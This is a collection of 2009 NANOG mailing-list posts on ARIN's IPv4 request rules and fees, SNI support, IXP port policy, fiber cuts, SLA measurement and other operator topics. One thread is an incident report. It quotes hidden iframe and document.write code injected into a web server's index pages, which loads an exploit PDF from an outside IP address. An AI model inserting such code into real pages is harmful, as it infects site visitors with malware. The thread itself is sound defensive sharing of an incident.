Apologies for a somewhat latent response - I was attending an IPv6 Seminar (of which ARIN was a sponsor) the last two days and am just getting to nanog mail today. On Tue, Apr 21, 2009 at 15:42, Shane Ronan sro...@fattoc.com wrote: I'm not sure if anyone agrees with me, but these responses seem like a big cop out to me. A) If ARIN is so concerned about the potential depletion of v4 resources, they should be taking a more proactive roll in proposing potential solutions and start conversation rather then saying that the users should come up with a proposal which they then get a big vote one. They is YOU. ARIN policy is created by the community - Your voice, your community. The statement should read: If [you] are so concerned about the potential depletion of v4 resources, [you] should be taking a more proactive [role] in proposing potential solutions and start[ing] conversation. If you participated in the ARIN PDP (1), even by just lurking on the ppml (2), you would already be aware that many folks have proposed many potential solutions (some of which have already been adopted) and that there _is_ an ongoing conversation that I strongly encourage you to join. B) Again, while it might be the IETF's job, shouldn't the group trusted with the management of the IP space at least have a public opinion about these solutions are designed. Ensuring that they are designed is such a way to guarantee maximum adoption of v6 and thus reducing the potential for depletion of v4 space. I think that developing resource management policy to meet those goals is much more in line with ARINs mandate. As I mentioned above, this is happening. C) Are ARIN's books open for public inspection? If so, it might be interesting for the group to see where all our money is going, since it's obviously not going to outreach and solution planning. Perhaps it is being spent in a reasonable manner, and the fees are where they need to be to sustain the organizations reasonable operations, but perhaps not. Links to annual statements etc. have already been provided. I am sure an email to ARIN (3) would help you answer your question further. Mr Curran, given the response you've seen from the group, and in particular the argument that most CEO's or Officers of firms will simply sign off on what they IT staff tells them (as they have little to no understanding of the situation), can you explain what exactly you are hoping to achieve by heaping on yet an additional requirement to the already over burdensome process of receiving an IPv4 allocation? I obviously can not speak for Mr. Curran, but I do applaud this effort. I believe that adding this requirement will lower exaggeration and fraud as well as raise awareness. These are both noble goals and well worth the marginal effort required. The argument that most officers will sign anything put in front of them is not very convincing to me. I have a hard time accepting incompetence or laziness as a valid rational for any argument at all really. ~Chris (speaking for myself) (1) - https://www.arin.net/knowledge/pdp/ (2) - https://www.arin.net/participate/mailing_lists/index.html (3) - mailto:i...@arin.net Shane Ronan --Opinions contained herein are strictly my own-- On Apr 21, 2009, at 9:01 AM, John Curran wrote: Roger - A few nits: A) ARIN's not ignoring unneeded legacy allocations, but can't take action without the Internet community first making some policy on what action should be taken... Please get together with folks of similar mind either via PPML or via Public Policy meeting at the the Open Policy Bof, and then propose a policy accordingly. B) Technical standards for NAT NAPT are the IETF's job, not ARIN's. C) We've routinely lowered fees since inception, not raised them. Thanks, /John John Curran Acting CEO ARIN -- Chris Grundemann weblog.chrisgrundemann.com
Re: Important New Requirement for IPv4 Requests
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Apr 21, 2009, at 5:49 AM, Frank Bulk - iName.com wrote: It appears that ARIN wants to raise the IP addressing space issue to the CxO level -- if it was interested in honesty, ARIN would have required a notarized statement by the person submitting the request. If ARIN really wants to get the interest of CEOs, raise the price! And punish those that do play by the rules? ARIN's prices are already crazy high for what they actually do. Chris - -- Chris Owen - Garden City (620) 275-1900 - Lottery (noun): President - Wichita (316) 858-3000 -A stupidity tax Hubris Communications Inc www.hubris.net - -- -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Public Key: http://home.hubris.net/owenc/pgpkey.txt Comment: Public Key ID: 0xB513D9DD iEYEARECAAYFAknt5BAACgkQElUlCLUT2d2fNACguc5HUFm7iutmdPPEMXVNpgJG UPsAmQFzuLQ5JdCOjWUALIvfIUZuLcPu =t813 -END PGP SIGNATURE-
Re: Important New Requirement for IPv4 Requests [re impacting revenue]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Apr 21, 2009, at 11:01 AM, John Curran wrote: C) We've routinely lowered fees since inception, not raised them. Well I'm not sure what your definitely of routinely is, but we've not seen in decrease in our fees any time in the past 8 years. Chris - -- Chris Owen - Garden City (620) 275-1900 - Lottery (noun): President - Wichita (316) 858-3000 -A stupidity tax Hubris Communications Inc www.hubris.net - -- -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Public Key: http://home.hubris.net/owenc/pgpkey.txt Comment: Public Key ID: 0xB513D9DD iEYEARECAAYFAknt/dEACgkQElUlCLUT2d1gZgCfeMxGeY2sH2wEzjgqn+l6Ybnh E74An3shoRmt27XCTKUqYNbF8TriwAWG =SY6H -END PGP SIGNATURE-
Re: Important New Requirement for IPv4 Requests [re impacting revenue]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Apr 21, 2009, at 4:42 PM, Shane Ronan wrote: C) Are ARIN's books open for public inspection? If so, it might be interesting for the group to see where all our money is going, since it's obviously not going to outreach and solution planning. Perhaps it is being spent in a reasonable manner, and the fees are where they need to be to sustain the organizations reasonable operations, but perhaps not. It is a little out of date and not terribly detailed but they did post the 2008 budget at: https://www.arin.net/about_us/corp_docs/budget.html Budget is just over 13M. About 1/2 of that is salaries/benefits (maybe more if you add in 'legal fees'). A couple of interesting notes when looking at it: 12+M divided by the 3300 members is just shy of $4,000 per customer. Payroll is $5,707,134 for 47 full time employees. That is an average salary of $121,428 across all employees. Internet Research and Support is $164,500 Travel (which includes travel for board members, etc) is $1,315,349. There is more detail but older data at: https://www.arin.net/about_us/corp_docs/annual/2007_audited_financials.pdf Chris - -- Chris Owen - Garden City (620) 275-1900 - Lottery (noun): President - Wichita (316) 858-3000 -A stupidity tax Hubris Communications Inc www.hubris.net - -- -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Public Key: http://home.hubris.net/owenc/pgpkey.txt Comment: Public Key ID: 0xB513D9DD iEYEARECAAYFAknuQOUACgkQElUlCLUT2d3YDACgswR2sqikAunbbgVdRKrlQBeE a1cAoJPkHf25ZKua73NVEWg0wz+ZYQLY =6Ceo -END PGP SIGNATURE-
Re: Important New Requirement for IPv4 Requests
Once upon a time, Jo Rhett jrh...@netconsonance.com said: Since virtual web hosting has no technical justification for IP space, I refuse it. SSL and FTP are techincal justifications for an IP per site. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Important New Requirement for IPv4 Requests
Once upon a time, Ricky Beam jfb...@gmail.com said: On Tue, 21 Apr 2009 18:40:30 -0400, Chris Adams cmad...@hiwaay.net wrote: SSL and FTP are techincal justifications for an IP per site. No they aren't. SSL will work just fine as a name-based virtual host with any modern webserver / browser. (Server Name Indication (SNI) [RFC3546, sec 3.1]) What is your definition of modern? According to Wikipedia http://en.wikipedia.org/wiki/Server_Name_Indication: Unsupported Operating Systems and Browsers The following combinations do not support SNI. * Windows XP and Internet Explorer 6 or 7 * Konqueror/KDE in any version * Apache with mod_ssl: there is a patch under review by httpd team for inclusion in future releases, after 2.2.11. See doco at [1] * Microsoft Internet Information Server IIS (As of 2007). Seeing as WinXP/IE is still the most common combination, SNI is a long time away from being useful. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Important New Requirement for IPv4 Requests
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Apr 20, 2009, at 9:04 PM, David Andersen wrote: Just a thought: A technical person might be very happy to lie to a toothless organization that holds no real sway over him or her, won't revoke the address space once granted, and for whom the benefit of lots of address space in which to play exceeds any potential pain from being caught, er, exaggerating their need for address space. That same technical person might be less inclined to lie to a director of their company who asks: Are you asking me to attest, publicly and perhaps legally, that this information is correct? If you're wrong and you make an ass of me, it's going to be yours that goes out the door. Seems like a reasonable experiment to try, at least. I agree there is no harm in the idea but as I was reading the announcement this morning I couldn't help but think Too little, too late. Chris - -- Chris Owen - Garden City (620) 275-1900 - Lottery (noun): President - Wichita (316) 858-3000 -A stupidity tax Hubris Communications Inc www.hubris.net - -- -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: Public Key: http://home.hubris.net/owenc/pgpkey.txt Comment: Public Key ID: 0xB513D9DD iEYEARECAAYFAkntKl0ACgkQElUlCLUT2d0engCgk3EJW7uu0j9p0ArLjRmZHseP cLMAnRqYov8CwxkF1E1pxP4zktUhA+HS =i5o1 -END PGP SIGNATURE-
Re: IXP
On Sun, 19 Apr 2009, Mikael Abrahamsson wrote: On Sat, 18 Apr 2009, Nick Hilliard wrote: - ruthless and utterly fascist enforcement of one mac address per port, using either L2 ACLs or else mac address counting, with no exceptions for any reason, ever. This is probably the single more important stability / security enforcement mechanism for any IXP. Well, as long as it simply drops packets and doesn't shut the port or some other fascist enforcement. We've had AMSIX complain that our Cisco 12k with E5 linecard was spitting out a few tens of packets per day during two months with random source mac addresses. Started suddenly, stopped suddenly. It's ok for them to drop the packets, but not shut the port in a case like that. From the IX operator perspective it is important to immediately shut down a port showing a packet from an extra MAC address, rather than just silently dropping them. The fascist reason being that it is a quick and effective way of informing the participant that their recent maintenance has gone afoul. At the SIX we have err-disable recovery set to 5 minutes so that the port will come back up automatically. (sometimes only to be shutdown again two packets later, and usually before any BGP sessions have returned) If the port is left up with the rogue packets simply being dropped, and the exchange sends the participant a followup email informing them of the problem, the participant's maintenance window may have already have passed and so problem resolution tends to get extended. In cases that are temporarily unfixable, such as router bug, we have been known to change the port config such that the rogue packets are just dropped/logged rather than answered with a shutdown, but that is rare. Chris SIX Janitor
Re: Malicious code just found on web server
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. -ChrisAM http://securabit.com On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg b...@wins.net wrote: FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com -Original Message- From: Russell Berg Sent: Friday, April 17, 2009 3:39 PM To: 'nanog@nanog.org' Subject: Malicious code just found on web server We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today: src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe iframe src=http://77.92.158.122/webmail/inc/web/index.php; style=display: none; height=0 width=0/iframe /body /html IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation. Just a heads up for folks; we have a team investigating... Russell Berg Dir - Product Development Airstream Communications b...@wins.net 715-832-3726
Re: Malicious code just found on web server
You beat me to it. -ChrisAM On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson fergdawgs...@gmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson fergdawgs...@gmail.com wrote: On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills securin...@gmail.com wrote: I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54 That javascript writes this to the page (URL obscured): document.write(embed src=\hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown| U nknown|US|1.2.3.4\ width=\0\ height=\0\ type=\application/pdf\/embed); The 1.2.3.4 in the URL is my public IP address (I changed that). Below the javascript, it grabs a PDF: embed src=include/two.pdf width=1 height=0 style=border:none/embed That PDF is on the site, I haven't looked at it yet though. Most likely a file that exploits a well-known vulnerability in Adobe Reader, which in turn probably loads malware from yet another location. We've been seeing a lot of this lately. Yes, definitely malicious: http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.3 (Build 5003) wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w /K0hKsJiAz4RGu8VQkyP+js= =AzJq -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawgster(at)gmail.com ferg's tech blog: http://fergdawg.blogspot.com/
Re: Fiber cut in SF area
Once upon a time, Jo¢ jbfixu...@gmail.com said: Yes if enough time goes by anything can happen, but how can one argue an ATM machince that has (at times) thousands of dollars stands out 24/7 without more immediate wealth. Perhaps I am missing something here, do the Cops stake out those areas? dunno We've had several occasions here where somebody has stolen a backhoe or front-end loader from a construction site, driven to the nearest ATM, and loaded the whole ATM into a (usually stolen) truck. Also, what is the density of outdoor ATMs? I'm in a suburban area, and there may be one every mile or two. How large is the fiber plant? Miles and miles of continuous fiber, every inch of which is equally important. A lot of it here is even on poles, not buried. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: [outages] fibre cut near 200 Paul, San Francisco
On 10/04/09 03:32, John Martinez wrote: BT Americas? Oh dear, and just after BT suffered a big cut in London. Who needs vandals when there's contractors about? http://www.theregister.co.uk/2009/04/08/bt_hole_hits_vodafone/ http://www.flickr.com/photos/23919...@n00/3426407496/
Re: Fiber cut in SF area
Monterey Road just north of Blossom Hill, San Jose On Thu, Apr 9, 2009 at 11:11 AM, Mike Lyon mike.l...@gmail.com wrote: Anyone know where the actual cut is? On 4/9/09, David W. Hankins david_hank...@isc.org wrote: On Thu, Apr 09, 2009 at 08:14:15AM -0700, Craig Holland wrote: Just dropping a note that there is a fiber cut in the SF area (I have a metro line down). AboveNet is reporting issues and I've heard unconfirmed reports that ATT and VZW are affected as well. Confirmed VZW ATT; http://cbs5.com/local/phone.internet.outage.2.980578.html Rather widespread general telco outage, the county has deployed extra patrol units in the south bay to compensate for not being able to call 911. Third video link in shows repairs underway. -- David W. Hankins If you don't do it right the first time, Software Engineer you'll just have to do it again. Internet Systems Consortium, Inc. -- Jack T. Hankins -- Sent from my mobile device
ATT Mail Administrator
Can someone from ATT contact off-list with the contact for the mail administrator? We recently got a new CIDR from ARIN and previously belonged to Adelphia. Needless to say, the IP's are pretty much blacklisted everywhere as dynamic IP space. I have gotten them pretty much cleaned up on other mail servers but I can't get a hold of ATT. Any help would be greatly appreciated! ---Chris
Re: Network SLA
On 18.03.2009, at 12:20, Saqib Ilyas wrote: I'm back! Thanks again to all those who replied. I am wondering how a service provider might assess availability or reliability figures using active measurements. Granted that one could set up traffic generators between the two PoPs which will be connected to a customer's sites, and then after a day of test traffic, I can look for downtimes and restoration times. This is an exact description of IPSLA. Of course you don't know whether a maximum bandwidth was in fact available, because you don't want to saturate the link. But a one day estimate is not a good estimate for what the service provider is promising, which is usually maximum of 10 hours downtime in an year, is it not? You need a year of measurement. Thanks and best regards On Fri, Mar 13, 2009 at 7:34 PM, Athanasios Douitsis aduit...@gmail.com wrote: Anyone interested in setting up his own IP SLA probes by hand and then collect the measurements into a database, can use a Perl tool we developed at 2005: http://sourceforge.net/projects/saa-collector It's rather old (SAA got renamed into IPSLA in the meantime) and, in retrospect, the code is a little rough around the edges, but it's nevertheless usable. Regards, Athanasios On Wed, Mar 11, 2009 at 10:20 PM, Andreas, Rich rich_andr...@cable.comcast.com wrote: I have found that Cisco IPSLA is heavily used in the MSO/Service Provider Space. Juniper has equivalent functionality via RPM. Rich -Original Message- From: Saqib Ilyas [mailto:msa...@gmail.com] Sent: Saturday, March 07, 2009 6:12 AM To: nanog@nanog.org Subject: Re: Network SLA I must thank everyone who has answered my queries. Just a couple more short questions. For instance, if one is using MRTG, and wants to check if we can meet a 1 Mbps end-to-end throughput between a couple of customer sites, I believe you would need to use some traffic generator tools, because MRTG merely imports counters from routers and plots them. Is that correct? We've heard of the BRIX active measurement tool in replies to my earlier email. Also, I've found Cisco IP SLA that also sends traffic into the service provider network and measures performance. How many people really use IP SLA feature? Thanks and best regards On Mon, Feb 23, 2009 at 1:19 PM, Zartash Uzmi zart...@gmail.com wrote: As I gather, there is a mix of answers, ranging from building the resources according to requirements and HOPE for the best to use of arguably sophisticated tools and perhaps sharing the results with the legal department. I would be particularly interested in hearing the service providers' viewpoint on the following situation. Consider a service provider with MPLS deployed within its own network. (A) When the SP enters into a relation with the customer, does the SP establish new MPLS paths based on customer demands (this is perhaps similar to building based on requirements as pointed out by David)? If yes, between what sites/POPs? I assume the answer may be different depending upon a single-site customer or a customer with multiple sites. (B) For entering into the relationship for providing X units of bandwidth (to another site of same customer or to the Tier-1 backbone), does the SP use any wisdom (in addition to MRTG and the likes)? If so, what scientific parameters are kept in mind? (C) How does the customer figure out that a promise for X units of bandwidth is maintained by the SP? I believe customers may install some measuring tools but is that really the case in practice? Thanks, Zartash On Fri, Feb 20, 2009 at 1:16 AM, Stefan netfort...@gmail.com wrote: Saqib Ilyas wrote: Greetings I am curious to know about any tools/techniques that a service provider uses to assess an SLA before signing it. That is to say, how does an administrator know if he/she can meet what he is promising. Is it based on experience? Are there commonly used tools for this? Thanks and best regards Not necessarily as a direct answer (I am pretty sure there'll be others on this list giving details in the area of specific tools and standards), but I think this may be a question (especially considering your end result concern: *signing the SLA!) equally applicable to your legal department. In the environment we live, nowadays, the SLA could (should?!? ... unfortunately) be refined and (at the other end - i.e. receiving) interpreted by the lawyers, with possibly equal effects (mostly financial and as overall impact on the business) as the tools we (the technical people) would be using to measure latency, uptime, bandwidth, jitter, etc... Stefan -- Muhammad Saqib Ilyas PhD Student, Computer Science and Engineering Lahore University of Management Sciences -- Muhammad Saqib Ilyas PhD Student, Computer Science and Engineering Lahore University of Management Sciences
Re: Dynamic IP log retention = 0?
Once upon a time, Neil kngsp...@gmail.com said: I think you are being a little naive. Port scans, while possibly used for malicious ends, can very often be benign. That sounds naive to me. From what I've seen, the number of malicious scans is much greater than the number of benign scans. The vast majority of end users have no idea what a port scan is or how to run one (or how to make sense of the output if they saw one run). In any case, this isn't really about the port scan. This is about Covad claiming they cannot identify who had an IP 48 hours ago. What if it wasn't a port scan; what if it was a DoS attack, spamming bot, etc.? Do you think Covad would respond to a DMCA complaint like that? -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Network SLA
Saqib, On 07.03.2009, at 12:12, Saqib Ilyas wrote: I must thank everyone who has answered my queries. Just a couple more short questions. For instance, if one is using MRTG, and wants to check if we can meet a 1 Mbps end-to-end throughput between a couple of customer sites, I believe you would need to use some traffic generator tools, because MRTG merely imports counters from routers and plots them. Is that correct? Yes, if you want to do a test bandwidth, iperf should probably be your first stop. We've heard of the BRIX active measurement tool in replies to my earlier email. Also, I've found Cisco IP SLA that also sends traffic into the service provider network and measures performance. How many people really use IP SLA feature? I know a lot of people that use IPSLA. Remember, that you set it up between two routers or higher-end switches and it constantly tests that connection. However, IPSLA is the wrong tool for a one-off test of whether you can push a Mbps from site A to site B, because you need to saturate the link to do that test. IPSLA is great for monitoring things like jitter. HTH, Chris Thanks and best regards On Mon, Feb 23, 2009 at 1:19 PM, Zartash Uzmi zart...@gmail.com wrote: As I gather, there is a mix of answers, ranging from building the resources according to requirements and HOPE for the best to use of arguably sophisticated tools and perhaps sharing the results with the legal department. I would be particularly interested in hearing the service providers' viewpoint on the following situation. Consider a service provider with MPLS deployed within its own network. (A) When the SP enters into a relation with the customer, does the SP establish new MPLS paths based on customer demands (this is perhaps similar to building based on requirements as pointed out by David)? If yes, between what sites/POPs? I assume the answer may be different depending upon a single-site customer or a customer with multiple sites. (B) For entering into the relationship for providing X units of bandwidth (to another site of same customer or to the Tier-1 backbone), does the SP use any wisdom (in addition to MRTG and the likes)? If so, what scientific parameters are kept in mind? (C) How does the customer figure out that a promise for X units of bandwidth is maintained by the SP? I believe customers may install some measuring tools but is that really the case in practice? Thanks, Zartash On Fri, Feb 20, 2009 at 1:16 AM, Stefan netfort...@gmail.com wrote: Saqib Ilyas wrote: Greetings I am curious to know about any tools/techniques that a service provider uses to assess an SLA before signing it. That is to say, how does an administrator know if he/she can meet what he is promising. Is it based on experience? Are there commonly used tools for this? Thanks and best regards Not necessarily as a direct answer (I am pretty sure there'll be others on this list giving details in the area of specific tools and standards), but I think this may be a question (especially considering your end result concern: *signing the SLA!) equally applicable to your legal department. In the environment we live, nowadays, the SLA could (should?!? ... unfortunately) be refined and (at the other end - i.e. receiving) interpreted by the lawyers, with possibly equal effects (mostly financial and as overall impact on the business) as the tools we (the technical people) would be using to measure latency, uptime, bandwidth, jitter, etc... Stefan -- Muhammad Saqib Ilyas PhD Student, Computer Science and Engineering Lahore University of Management Sciences
Re: Usage-Based Billing for DIA
Once upon a time, Jon Lewis jle...@lewis.org said: 1) we have customers on policed ports, and the interface snmp counters count packets before service-policy. It doesn't seem right to bill for packets we dropped :)...so this isn't useful data for billing purposes. Not sure how you are policing, but I belive both Juniper and Cisco have MIBs that show the policed traffic. For example, when we used Cisco CAR to limit traffic on some ports, I set up Cricket to monitor both the base port and the CAR stats (so we could see how much traffic was actually passed). I haven't got around to doing it for Juniper firewall policers, but I pretty sure the info is in a MIB. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Yahoo postmaster?
Can a Yahoo postmaster ping me off list? I've got a couple of servers that appear to be mis-categorized. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: Yahoo postmaster?
Once upon a time, Matthew Petach mpet...@netflight.com said: On 3/3/09, Chris Adams cmad...@hiwaay.net wrote: Can a Yahoo postmaster ping me off list? I've got a couple of servers that appear to be mis-categorized. Contact information for the Yahoo postmasters is listed at http://postmaster.yahoo.com/ We've filled out multiple forms there with no response. That's why I asked here. -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: switch speed question
Once upon a time, Roy r.engehau...@gmail.com said: I think your math is faulty. While there may be 24G going in and 24G going out, there is only 24G crossing the backplane. You can't count a bit twice (once on in and once on out). Its the same bit. Not every bit in results in just one bit out. Broadcast, multicast, flooding for unknown MACs (or switching failures), ... -- Chris Adams cmad...@hiwaay.net Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble.
Re: comcast price check
How much scheduled downtime was there? ---Chris On Feb 23, 2009, at 11:46 AM, Justin Wilson - MTIN wrote: In a Former Life we used Comcast for transport for a school corporation. In the 3 years we used them we have 10 minutes of unscheduled downtime. Justin
